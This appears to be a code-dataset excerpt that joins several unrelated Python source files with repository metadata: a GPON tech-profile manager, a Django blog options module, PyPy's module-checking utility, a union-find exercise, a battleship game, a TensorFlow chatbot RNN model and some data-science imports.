TechProfile.MAX_PROBABILITY]),
discard_policy=ds_gemport_attr_list[i][
TechProfile.DISCARD_POLICY],
priority_q=ds_gemport_attr_list[i][
TechProfile.PRIORITY_Q],
weight=ds_gemport_attr_list[i][TechProfile.WEIGHT],
scheduling_policy=ds_gemport_attr_list[i][
TechProfile.SCHEDULING_POLICY],
max_q_size=ds_gemport_attr_list[i][
TechProfile.MAX_Q_SIZE],
aes_encryption=ds_gemport_attr_list[i][
TechProfile.AES_ENCRYPTION]))
return TechProfile.DefaultTechProfile(
tech_profile[TechProfile.NAME],
profile_type=tech_profile[TechProfile.PROFILE_TYPE],
version=tech_profile[TechProfile.VERSION],
num_gem_ports=tech_profile[TechProfile.NUM_GEM_PORTS],
instance_control=instance_control,
us_scheduler=us_scheduler,
ds_scheduler=ds_scheduler,
upstream_gem_port_attribute_list=upstream_gem_port_attribute_list,
downstream_gem_port_attribute_list=
downstream_gem_port_attribute_list)
def _add_tech_profile_instance(self, path, tech_profile_instance):
"""
Add tech profile to kv store.
:param path: path to add tech profile
:param tech_profile_instance: tech profile instance need to be added
"""
try:
self._kv_store[path] = str(tech_profile_instance)
log.debug("Add-tech-profile-instance-success", path=path,
tech_profile_instance=tech_profile_instance)
return True
except BaseException as e:
log.exception("Add-tech-profile-instance-failed", path=path,
tech_profile_instance=tech_profile_instance,
exception=e)
return False
@staticmethod
def get_us_scheduler(tech_profile_instance):
# upstream scheduler
us_scheduler = openolt_pb2.Scheduler(
direction=TechProfile.get_parameter(
'direction', tech_profile_instance.us_scheduler.
direction),
additional_bw=TechProfile.get_parameter(
'additional_bw', tech_profile_instance.
us_scheduler.additional_bw),
priority=tech_profile_instance.us_scheduler.priority,
weight=tech_profile_instance.us_scheduler.weight,
sched_policy=TechProfile.get_parameter(
'sched_policy', tech_profile_instance.
us_scheduler.q_sched_policy))
return us_scheduler
@staticmethod
def get_ds_scheduler(tech_profile_instance):
ds_scheduler = openolt_pb2.Scheduler(
direction=TechProfile.get_parameter(
'direction', tech_profile_instance.ds_scheduler.
direction),
additional_bw=TechProfile.get_parameter(
'additional_bw', tech_profile_instance.
ds_scheduler.additional_bw),
priority=tech_profile_instance.ds_scheduler.priority,
weight=tech_profile_instance.ds_scheduler.weight,
sched_policy=TechProfile.get_parameter(
'sched_policy', tech_profile_instance.ds_scheduler.
q_sched_policy))
return ds_scheduler
@staticmethod
def get_tconts(tech_profile_instance, us_scheduler=None, ds_scheduler=None):
if us_scheduler is None:
us_scheduler = TechProfile.get_us_scheduler(tech_profile_instance)
if ds_scheduler is None:
ds_scheduler = TechProfile.get_ds_scheduler(tech_profile_instance)
tconts = [openolt_pb2.Tcont(direction=TechProfile.get_parameter(
'direction',
tech_profile_instance.
us_scheduler.direction),
alloc_id=tech_profile_instance.
us_scheduler.alloc_id,
scheduler=us_scheduler),
openolt_pb2.Tcont(direction=TechProfile.get_parameter(
'direction',
tech_profile_instance.
ds_scheduler.direction),
alloc_id=tech_profile_instance.
ds_scheduler.alloc_id,
scheduler=ds_scheduler)]
return tconts
@staticmethod
def get_parameter(param_type, param_value):
parameter = None
try:
if param_type == 'direction':
for direction in openolt_pb2.Direction.keys():
if param_value == direction:
parameter = direction
elif param_type == 'discard_policy':
for discard_policy in openolt_pb2.DiscardPolicy.keys():
if param_value == discard_policy:
parameter = discard_policy
elif param_type == 'sched_policy':
for sched_policy in openolt_pb2.SchedulingPolicy.keys():
if param_value == sched_policy:
parameter = sched_policy
elif param_type == 'additional_bw':
for bw_component in openolt_pb2.AdditionalBW.keys():
if param_value == bw_component:
parameter = bw_component
except BaseException as e:
log.exception(exception=e)
return parameter
class TechProfileInstance(object):
def __init__(self, subscriber_identifier, tech_profile, resource_mgr,
intf_id, num_of_tconts=1):
if tech_profile is not None:
self.subscriber_identifier = subscriber_identifier
self.num_of_tconts = num_of_tconts
self.num_of_gem_ports = tech_profile.num_gem_ports
self.name = tech_profile.name
self.profile_type = tech_profile.profile_type
self.version = tech_profile.version
self.instance_control = tech_profile.instance_control
# TODO: Fixed num_of_tconts to 1 per TP Instance.
# This may change in future
assert (num_of_tconts == 1)
# Get alloc id and gemport id using resource manager
alloc_id = resource_mgr.get_resource_id(intf_id,
'ALLOC_ID',
num_of_tconts)
gem_ports = resource_mgr.get_resource_id(intf_id,
'GEMPORT_ID',
self.num_of_gem_ports)
gemport_list = list()
if isinstance(gem_ports, int):
gemport_list.append(gem_ports)
elif isinstance(gem_ports, list):
for gem in gem_ports:
gemport_list.append(gem)
else:
raise Exception("invalid-type")
self.us_scheduler = TechProfileInstance.IScheduler(
alloc_id, tech_profile.us_scheduler)
self.ds_scheduler = TechProfileInstance.IScheduler(
alloc_id, tech_profile.ds_scheduler)
self.upstream_gem_port_attribute_list = list()
self.downstream_gem_port_attribute_list = list()
for i in range(self.num_of_gem_ports):
self.upstream_gem_port_attribute_list.append(
TechProfileInstance.IGemPortAttribute(
gemport_list[i],
tech_profile.upstream_gem_port_attribute_list[
i]))
self.downstream_gem_port_attribute_list.append(
TechProfileInstance.IGemPortAttribute(
gemport_list[i],
tech_profile.downstream_gem_port_attribute_list[
i]))
class IScheduler(Scheduler):
def __init__(self, alloc_id, scheduler):
super(TechProfileInstance.IScheduler, self).__init__(
scheduler.direction, scheduler.additional_bw,
scheduler.priority,
scheduler.weight, scheduler.q_sched_policy)
self.alloc_id = alloc_id
class IGemPortAttribute(GemPortAttribute):
def __init__(self, gemport_id, gem_port_attribute):
super(TechProfileInstance.IGemPortAttribute, self).__init__(
gem_port_attribute.pbit_map, gem_port_attribute.discard_config,
gem_port_attribute.aes_encryption,
gem_port_attribute.scheduling_policy,
gem_port_attribute.priority_q, gem_port_attribute.weight,
gem_port_attribute.max_q_size,
gem_port_attribute.discard_policy)
self.gemport_id = gemport_id
def to_json(self):
return json.dumps(self, default=lambda o: o.__dict__,
indent=4)
| 44.543294 | 100 | 0.605809 |
6841e42176cff92d1b3d388da4318e1a0a7c62dc | 3,181 | py | Python | djangoplicity/blog/options.py | djangoplicity/blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | null | null | null | djangoplicity/blog/options.py | djangoplicity/blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | 1 | 2021-10-20T00:11:16.000Z | 2021-10-20T00:17:51.000Z | djangoplicity/blog/options.py | djangoplicity/djangoplicity-blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# eso-blog
# Copyright (c) 2007-2017, European Southern Observatory (ESO)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the European Southern Observatory nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL ESO BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE
from django.utils.translation import ugettext_noop as _
from djangoplicity.archives.contrib.browsers import ListBrowser
from djangoplicity.archives.contrib.queries.defaults import AllPublicQuery, \
EmbargoQuery
from djangoplicity.archives.options import ArchiveOptions
from djangoplicity.blog.queries import PostTagQuery
from djangoplicity.blog.models import Tag
from djangoplicity.blog.views import PostDetailView
class PostOptions(ArchiveOptions):
slug_field = 'slug'
urlname_prefix = 'blog'
template_name = 'archives/post/detail.html'
detail_view = PostDetailView
select_related = ('banner', )
prefetch_related = ('tags', 'authordescription_set__author')
class Queries(object):
default = AllPublicQuery(browsers=('normal', ), verbose_name=_('Blog Posts'), feed_name='default', select_related=['category'])
staging = EmbargoQuery(browsers=('normal', ), verbose_name=_('Blog Posts (Staging)'))
tag = PostTagQuery(browsers=('normal', ), relation_field='tags', url_field='slug', title_field='name', use_category_title=True, verbose_name='%s')
category = PostTagQuery(browsers=('normal', ), relation_field='category', url_field='slug', title_field='name', use_category_title=True, verbose_name='%s')
class Browsers(object):
normal = ListBrowser()
@staticmethod
def extra_context( obj, lang=None ):
return {
'tags': Tag.objects.order_by('name')
}
@staticmethod
def feeds():
from djangoplicity.blog.feeds import PostFeed
return {
'': PostFeed,
}
| 43.575342 | 163 | 0.735932 |
5fb0a319f4e5206d0c120bcad50a91a63cfb22c6 | 2,716 | py | Python | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-06-02T23:02:09.000Z | 2021-06-02T23:02:09.000Z | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-03-30T18:08:41.000Z | 2021-03-30T18:08:41.000Z | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import sys
import traceback
from rpython.translator.tool.pdbplus import PdbPlusShow
from pypy.objspace.fake.objspace import FakeObjSpace, W_Root
from pypy.config.pypyoption import get_pypy_config
def checkmodule(modname, translate_startup=True, ignore=(),
c_compile=False, extra_func=None, rpython_opts=None,
pypy_opts=None, show_pdbplus=False):
"""
Check that the module 'modname' translates.
Options:
translate_startup: TODO, document me
ignore: list of module interpleveldefs/appleveldefs to ignore
c_compile: determine whether to inokve the C compiler after rtyping
extra_func: extra function which will be annotated and called. It takes
a single "space" argment
rpython_opts: dictionariy containing extra configuration options
pypy_opts: dictionariy containing extra configuration options
show_pdbplus: show Pdb+ prompt on error. Useful for pdb commands such as
flowg, callg, etc.
"""
config = get_pypy_config(translating=True)
if pypy_opts:
config.set(**pypy_opts)
space = FakeObjSpace(config)
seeobj_w = []
modules = []
modnames = [modname]
for modname in modnames:
mod = __import__(
'pypy.module.%s.moduledef' % modname, None, None, ['__doc__'])
# force computation and record what we wrap
module = mod.Module(space, W_Root())
module.setup_after_space_initialization()
module.init(space)
modules.append(module)
for name in module.loaders:
if name in ignore:
continue
seeobj_w.append(module._load_lazily(space, name))
if hasattr(module, 'submodules'):
for cls in module.submodules.itervalues():
submod = cls(space, W_Root())
for name in submod.loaders:
seeobj_w.append(submod._load_lazily(space, name))
#
def func():
for mod in modules:
mod.startup(space)
if not translate_startup:
func() # call it now
func = None
opts = {'translation.list_comprehension_operations': True}
if rpython_opts:
opts.update(rpython_opts)
try:
space.translates(func, seeobj_w=seeobj_w,
c_compile=c_compile, extra_func=extra_func, **opts)
except:
if not show_pdbplus:
raise
print
exc, val, tb = sys.exc_info()
traceback.print_exc()
sys.pdbplus = p = PdbPlusShow(space.t)
p.start(tb)
else:
if show_pdbplus:
sys.pdbplus = p = PdbPlusShow(space.t)
p.start(None)
| 33.530864 | 79 | 0.624448 |
a94b98d1fe8084cab0f55c93d7522de9d218562c | 1,170 | py | Python | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | 1 | 2021-12-19T14:17:46.000Z | 2021-12-19T14:17:46.000Z | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | null | null | null | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
# author: pyclearl
class Solution:
"""
字符串相似程度判断
转化为连通性问题
"""
def __init__(self, maps):
self.maps = maps
# 还没想清数据结构怎么处理
# self.count = None
# self._map = {}
def union(self, p, q):
p_map = self.find(p)
q_map = self.find(q)
if p_map == q_map:
return
for i in self._map.keys():
if self._map[i] == p_map:
self._map[i] = q_map
self.count -= 1
def find(self, p):
return self._map[p]
def connected(self, p, q):
return self.find(p) == self.find(q)
def judge(self, s1, s2):
str1 = s1.split()
str2 = s2.split()
for p, q in zip(str1, str2):
if self.connected(p, q):
continue
else:
return False
return True
if __name__ == '__main__':
maps = {
"movie": "film",
"book": "note",
"film": "show",
"review": "rating"
}
s = Solution()
assert s.judge("movie visible", "film show")
assert not s.judge("book review", "movie rating")
| 21.272727 | 53 | 0.482051 |
b8eb548e2131ebb9f799a60f9816796bacb618a3 | 1,552 | py | Python | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | from collections import defaultdict
def battleshipGame(board, moves):
directions = [[1,0] , [0,1]]
d = defaultdict(list)
ship = 0
shipFound = False
output = []
for i in range(len(board)):
for j in range(len(board[0])):
if board[i][j] == "#":
d[ship].append([i,j])
board[i][j] = "."
shipFound = False
for dx, dy in directions:
x = i
y = j
while(x+dx < len(board) and y + dy < len(board[0])):
x += dx
y += dy
if board[x][y] == "#":
d[ship].append([x,y])
board[x][y] = "."
shipFound = True
else:
break
if shipFound:
break
ship += 1
for move in moves:
miss = True
for i, values in enumerate(d.values()):
if move in values:
if len(values) == 1:
if len(d) == 1:
output.append("Game Over")
return output
else:
d.pop(i, None)
output.append("Dead")
miss = False
break
else:
values.remove(move)
output.append("Hit")
miss = False
break
if miss:
output.append("Miss")
return output
board = [[".", ".","#","#"],
[".", ".","#","#"],
["#", ".",".","."],
[".", ".",".","."]]
moves = [[0,2],[1,2], [0,3], [1,3],[2,0],[3,0]]
print(battleshipGame(board, moves))
| 18.258824 | 62 | 0.399485 |
256aedd339168e4122f80fc5dd91c890cafed495 | 14,892 | py | Python | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | import tensorflow as tf
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.framework import ops
from tensorflow.compat.v1.nn import rnn_cell as rnn
#from tensorflow.contrib import rnn
from tensorflow.python.util.nest import flatten
tf.compat.v1.disable_eager_execution()
import numpy as np
class PartitionedMultiRNNCell(rnn_cell.RNNCell):
"""RNN cell composed sequentially of multiple simple cells."""
# Diagramn of a PartitionedMultiRNNCell net with three layers and three partitions per layer.
# Each brick shape is a partition, which comprises one RNNCell of size partition_size.
# The two tilde (~) characters indicate wrapping (i.e. the two halves are a single partition).
# Like laying bricks, each layer is offset by half a partition width so that influence spreads
# horizontally through subsequent layers, while avoiding the quadratic resource scaling of fully
# connected layers with respect to layer width.
# output
# //////// \\\\\\\\
# -------------------
# | | | |
# -------------------
# ~ | | | ~
# -------------------
# | | | |
# -------------------
# \\\\\\\\ ////////
# input
def __init__(self, cell_fn, partition_size=128, partitions=1, layers=2):
"""Create a RNN cell composed sequentially of a number of RNNCells.
Args:
cell_fn: reference to RNNCell function to create each partition in each layer.
partition_size: how many horizontal cells to include in each partition.
partitions: how many horizontal partitions to include in each layer.
layers: how many layers to include in the net.
"""
super(PartitionedMultiRNNCell, self).__init__()
self._cells = []
for i in range(layers):
self._cells.append([cell_fn(partition_size) for _ in range(partitions)])
self._partitions = partitions
@property
def state_size(self):
# Return a 2D tuple where each row is the partition's cell size repeated `partitions` times,
# and there are `layers` rows of that.
return tuple(((layer[0].state_size,) * len(layer)) for layer in self._cells)
@property
def output_size(self):
# Return the output size of each partition in the last layer times the number of partitions per layer.
return self._cells[-1][0].output_size * len(self._cells[-1])
def zero_state(self, batch_size, dtype):
# Return a 2D tuple of zero states matching the structure of state_size.
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
return tuple(tuple(cell.zero_state(batch_size, dtype) for cell in layer) for layer in self._cells)
def call(self, inputs, state):
layer_input = inputs
new_states = []
for l, layer in enumerate(self._cells):
# In between layers, offset the layer input by half of a partition width so that
# activations can horizontally spread through subsequent layers.
if l > 0:
offset_width = layer[0].output_size // 2
layer_input = tf.concat((layer_input[:, -offset_width:], layer_input[:, :-offset_width]),
axis=1, name='concat_offset_%d' % l)
# Create a tuple of inputs by splitting the lower layer output into partitions.
p_inputs = tf.split(layer_input, len(layer), axis=1, name='split_%d' % l)
p_outputs = []
p_states = []
for p, p_inp in enumerate(p_inputs):
with vs.variable_scope("cell_%d_%d" % (l, p)):
p_state = state[l][p]
cell = layer[p]
p_out, new_p_state = cell(p_inp, p_state)
p_outputs.append(p_out)
p_states.append(new_p_state)
new_states.append(tuple(p_states))
layer_input = tf.concat(p_outputs, axis=1, name='concat_%d' % l)
new_states = tuple(new_states)
return layer_input, new_states
def _rnn_state_placeholders(state):
"""Convert RNN state tensors to placeholders, reflecting the same nested tuple structure."""
# Adapted from @carlthome's comment:
# https://github.com/tensorflow/tensorflow/issues/2838#issuecomment-302019188
if isinstance(state, tf.compat.v1.nn.rnn_cell.LSTMStateTuple):
c, h = state
c = tf.compat.v1.placeholder(c.dtype, c.shape, c.op.name)
h = tf.compat.v1.placeholder(h.dtype, h.shape, h.op.name)
return tf.compat.v1.nn.rnn_cell.LSTMStateTuple(c, h)
elif isinstance(state, tf.Tensor):
h = state
h = tf.compat.v1.placeholder(h.dtype, h.shape, h.op.name)
return h
else:
structure = [_rnn_state_placeholders(x) for x in state]
return tuple(structure)
class Model():
def __init__(self, args, infer=False): # infer is set to true during sampling.
self.args = args
if infer:
# Worry about one character at a time during sampling; no batching or BPTT.
args.batch_size = 1
args.seq_length = 1
# Set cell_fn to the type of network cell we're creating -- RNN, GRU, LSTM or NAS.
if args.model == 'rnn':
cell_fn = rnn_cell.BasicRNNCell
elif args.model == 'gru':
cell_fn = rnn_cell.GRUCell
elif args.model == 'lstm':
cell_fn = rnn_cell.BasicLSTMCell
elif args.model == 'nas':
cell_fn = rnn.NASCell
else:
raise Exception("model type not supported: {}".format(args.model))
# Create variables to track training progress.
self.lr = tf.Variable(args.learning_rate, name="learning_rate", trainable=False)
self.global_epoch_fraction = tf.Variable(0.0, name="global_epoch_fraction", trainable=False)
self.global_seconds_elapsed = tf.Variable(0.0, name="global_seconds_elapsed", trainable=False)
# Call tensorflow library tensorflow-master/tensorflow/python/ops/rnn_cell
# to create a layer of block_size cells of the specified basic type (RNN/GRU/LSTM).
# Use the same rnn_cell library to create a stack of these cells
# of num_layers layers. Pass in a python list of these cells.
# cell = rnn_cell.MultiRNNCell([cell_fn(args.block_size) for _ in range(args.num_layers)])
# cell = MyMultiRNNCell([cell_fn(args.block_size) for _ in range(args.num_layers)])
cell = PartitionedMultiRNNCell(cell_fn, partitions=args.num_blocks,
partition_size=args.block_size, layers=args.num_layers)
# Create a TF placeholder node of 32-bit ints (NOT floats!),
# of shape batch_size x seq_length. This shape matches the batches
# (listed in x_batches and y_batches) constructed in create_batches in utils.py.
# input_data will receive input batches.
self.input_data = tf.compat.v1.placeholder(tf.int32, [args.batch_size, args.seq_length])
self.zero_state = cell.zero_state(args.batch_size, tf.float32)
self.initial_state = _rnn_state_placeholders(self.zero_state)
self._flattened_initial_state = flatten(self.initial_state)
layer_size = args.block_size * args.num_blocks
# Scope our new variables to the scope identifier string "rnnlm".
with tf.compat.v1.variable_scope('rnnlm'):
# Create new variable softmax_w and softmax_b for output.
# softmax_w is a weights matrix from the top layer of the model (of size layer_size)
# to the vocabulary output (of size vocab_size).
softmax_w = tf.compat.v1.get_variable("softmax_w", [layer_size, args.vocab_size])
# softmax_b is a bias vector of the ouput characters (of size vocab_size).
softmax_b = tf.compat.v1.get_variable("softmax_b", [args.vocab_size])
# Create new variable named 'embedding' to connect the character input to the base layer
# of the RNN. Its role is the conceptual inverse of softmax_w.
# It contains the trainable weights from the one-hot input vector to the lowest layer of RNN.
embedding = tf.compat.v1.get_variable("embedding", [args.vocab_size, layer_size])
# Create an embedding tensor with tf.nn.embedding_lookup(embedding, self.input_data).
# This tensor has dimensions batch_size x seq_length x layer_size.
inputs = tf.nn.embedding_lookup(embedding, self.input_data)
# TODO: Check arguments parallel_iterations (default uses more memory and less time) and
# swap_memory (default uses more memory but "minimal (or no) performance penalty")
outputs, self.final_state = tf.compat.v1.nn.dynamic_rnn(cell, inputs,
initial_state=self.initial_state, scope='rnnlm')
# outputs has shape [batch_size, max_time, cell.output_size] because time_major == false.
# Do we need to transpose the first two dimensions? (Answer: no, this ruins everything.)
# outputs = tf.transpose(outputs, perm=[1, 0, 2])
output = tf.reshape(outputs, [-1, layer_size])
# Obtain logits node by applying output weights and biases to the output tensor.
# Logits is a tensor of shape [(batch_size * seq_length) x vocab_size].
# Recall that outputs is a 2D tensor of shape [(batch_size * seq_length) x layer_size],
# and softmax_w is a 2D tensor of shape [layer_size x vocab_size].
# The matrix product is therefore a new 2D tensor of [(batch_size * seq_length) x vocab_size].
# In other words, that multiplication converts a loooong list of layer_size vectors
# to a loooong list of vocab_size vectors.
# Then add softmax_b (a single vocab-sized vector) to every row of that list.
# That gives you the logits!
self.logits = tf.matmul(output, softmax_w) + softmax_b
if infer:
# Convert logits to probabilities. Probs isn't used during training! That node is never calculated.
# Like logits, probs is a tensor of shape [(batch_size * seq_length) x vocab_size].
# During sampling, this means it is of shape [1 x vocab_size].
self.probs = tf.nn.softmax(self.logits)
else:
# Create a targets placeholder of shape batch_size x seq_length.
# Targets will be what output is compared against to calculate loss.
self.targets = tf.compat.v1.placeholder(tf.int32, [args.batch_size, args.seq_length])
# seq2seq.sequence_loss_by_example returns 1D float Tensor containing the log-perplexity
# for each sequence. (Size is batch_size * seq_length.)
# Targets are reshaped from a [batch_size x seq_length] tensor to a 1D tensor, of the following layout:
# target character (batch 0, seq 0)
# target character (batch 0, seq 1)
# ...
# target character (batch 0, seq seq_len-1)
# target character (batch 1, seq 0)
# ...
# These targets are compared to the logits to generate loss.
# Logits: instead of a list of character indices, it's a list of character index probability vectors.
# seq2seq.sequence_loss_by_example will do the work of generating losses by comparing the one-hot vectors
# implicitly represented by the target characters against the probability distrutions in logits.
# It returns a 1D float tensor (a vector) where item i is the log-perplexity of
# the comparison of the ith logit distribution to the ith one-hot target vector.
loss = nn_ops.sparse_softmax_cross_entropy_with_logits(
labels=tf.reshape(self.targets, [-1]), logits=self.logits)
# Cost is the arithmetic mean of the values of the loss tensor.
# It is a single-element floating point tensor. This is what the optimizer seeks to minimize.
self.cost = tf.reduce_mean(loss)
# Create a tensorboard summary of our cost.
tf.summary.scalar("cost", self.cost)
tvars = tf.trainable_variables() # tvars is a python list of all trainable TF Variable objects.
# tf.gradients returns a list of tensors of length len(tvars) where each tensor is sum(dy/dx).
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
args.grad_clip)
optimizer = tf.train.AdamOptimizer(self.lr) # Use ADAM optimizer.
# Zip creates a list of tuples, where each tuple is (variable tensor, gradient tensor).
# Training op nudges the variables along the gradient, with the given learning rate, using the ADAM optimizer.
# This is the op that a training session should be instructed to perform.
self.train_op = optimizer.apply_gradients(zip(grads, tvars))
#self.train_op = optimizer.minimize(self.cost)
self.summary_op = tf.summary.merge_all()
def add_state_to_feed_dict(self, feed_dict, state):
for i, tensor in enumerate(flatten(state)):
feed_dict[self._flattened_initial_state[i]] = tensor
def save_variables_list(self):
# Return a list of the trainable variables created within the rnnlm model.
# This consists of the two projection softmax variables (softmax_w and softmax_b),
# embedding, and all of the weights and biases in the MultiRNNCell model.
# Save only the trainable variables and the placeholders needed to resume training;
# discard the rest, including optimizer state.
save_vars = set(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, scope='rnnlm'))
save_vars.update({self.lr, self.global_epoch_fraction, self.global_seconds_elapsed})
return list(save_vars)
def forward_model(self, sess, state, input_sample):
'''Run a forward pass. Return the updated hidden state and the output probabilities.'''
shaped_input = np.array([[input_sample]], np.float32)
inputs = {self.input_data: shaped_input}
self.add_state_to_feed_dict(inputs, state)
[probs, state] = sess.run([self.probs, self.final_state], feed_dict=inputs)
return probs[0], state
def trainable_parameter_count(self):
total_parameters = 0
for variable in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='rnnlm'):
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
return total_parameters
| 55.155556 | 122 | 0.656796 |
10dc46c386e5b83b3d5e63f3774ca8ec9acddd9c | 2,961 | py | Python | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | 1 | 2019-11-30T17:45:00.000Z | 2019-11-30T17:45:00.000Z | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | null | null | null | cli-ui/client.py | Fede-26/argoscuolanext-client | f5c85e0ddc38aa5796fd7042075e61062e27fe70 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# applicazione principale (avviare questa)
import datetime
import os
import sys
import pprint
pp = pprint.PrettyPrinter(indent=4)
sys.path.append("../modules")
import gestdati as gsd
def voti(raw): #tutti i voti assegnati
for x in reversed(raw["dati"]):
if x["codVotoPratico"] == 'N':
voto_pratico = "orale"
elif x["codVotoPratico"] == 'S':
voto_pratico = "scritto"
elif x["codVotoPratico"] == 'P':
voto_pratico = "pratico"
print(x["datGiorno"], (x["desMateria"].lower()).capitalize(), ": ", x["codVoto"], " - ", voto_pratico, " (", x["desProva"], ")\n")
def cosa_successo_oggi(raw):
for x in raw["dati"]:
try:
print(x["dati"]["desMateria"], ": ", x["dati"]["desArgomento"], "\n")
except KeyError:
pass
def compiti_asse_data(raw): #compiti assegnati una determinata data
data = input("Data di assegnamento compiti (mm-gg): ")
data = '2019-' + data
print()
for x in raw["dati"]:
if x["datGiorno"] == data:
if x["datCompitiPresente"]:
data_consegna = "per il " + x["datCompiti"]
else:
data_consegna = ''
print(x["datGiorno"], data_consegna, "-", (x["desMateria"].lower()).capitalize(), ": ", x["desCompiti"], "\n")
def compiti_asse_sett(raw): #compiti assegnati fino a 7 giorni prima
oggi = datetime.date.today()
settimana = []
for i in range(7):
settimana.append(oggi - datetime.timedelta(days=i))
for data in reversed(settimana):
for x in raw["dati"]:
# print(data)
# print(x["datGiorno"])
if x["datGiorno"] == str(data):
print(x["datGiorno"], "-", (x["desMateria"].lower()).capitalize(), ": ", x["desCompiti"], "\n")
def promemoria(raw):
oggi = datetime.date.today()
for x in raw["dati"]:
if x["datGiorno"] >= str(oggi):
print(x["datGiorno"] + " : " + x["desAnnotazioni"])
def main():
dati_oggi, dati_voti, dati_compiti, dati_promemoria = gsd.get_dati()
while 1:
what_view = input(
"""\n\nCosa vuoi vedere?
(V)oti,
cosa hai fatto (O)ggi,
(C)ompiti, (CS)compiti sett. scorsa,
(P)romemoria
(UP)date,
(del-all)
(99)exit,
[DEBUG: add R for raw output]... """).lower()
print()
if what_view == 'v':
voti(dati_voti)
elif what_view == 'vr':
pp.pprint(dati_voti)
elif what_view == 'o':
cosa_successo_oggi(dati_oggi)
elif what_view == 'or':
pp.pprint(dati_oggi)
elif what_view == 'c':
compiti_asse_data(dati_compiti)
elif what_view == 'cr':
pp.pprint(dati_compiti)
elif what_view == 'cs':
compiti_asse_sett(dati_compiti)
elif what_view == 'p':
promemoria(dati_promemoria)
elif what_view == 'pr':
pp.pprint(dati_promemoria)
elif what_view == 'up':
gsd.update_dati()
gsd.get_dati()
elif what_view == 'del-all':
try:
os.remove(gsd.paths["dati"])
os.remove(gsd.paths["credenziali"])
exit()
except FileNotFoundError:
print("1 or more file not found")
exit()
elif what_view == '99':
exit()
else:
print()
if __name__ == '__main__':
main()
| 22.097015 | 132 | 0.636609 |
660054c5a92f648080fe4a312b4cfbca46791e75 | 970 | py | Python | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | part1.py | cewinharhar/BECS2_dataChallenge | da7088316149a800733366c0da6079e0558ad913 | [
"MIT"
] | null | null | null | #import necessary packages
import os
import random
import xgboost
import joblib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from sklearn import metrics
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.impute import SimpleImputer
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
